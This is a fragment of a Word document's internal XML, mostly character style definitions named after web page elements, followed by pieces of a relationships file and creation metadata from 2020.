    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="quote3"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="reward-close"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="red"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="tip2"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="tip3"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="hover10"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="recommend-article-type"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="8FB0C9"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="txt"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="text10"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="advert-count-people"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="advert-money"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="E33E33"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="nth-child(3n+1)"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="tip"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999AAA"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="tip1"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="text12"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="text"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="hover9"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="name"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="555666"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="hover"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="hover4"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="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numbering" Target="numbering.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1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jpe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2020-09-01T06:39:00Z</dcterms:created>
  <dc:creator>86133</dc:creator>
  <cp:lastModifiedBy>kotonami_wataru</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-11T03:22:14Z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